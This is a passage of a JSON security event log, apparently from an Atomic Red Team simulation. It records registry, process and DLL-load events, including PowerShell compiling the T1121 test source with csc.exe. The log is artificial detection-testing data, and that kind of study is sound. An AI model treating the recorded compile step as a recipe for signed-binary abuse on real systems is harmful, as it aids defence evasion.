"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869340000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "file", - "file_name": "key.snk", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\key.snk", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "timestamp": 131883570869810016, - "unique_pid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7696, - "ppid": 7036, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "create", - "timestamp": 131883570869860000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "csc.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 7696, - 
"process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - 
"image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": 
"{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - 
"timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "psapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 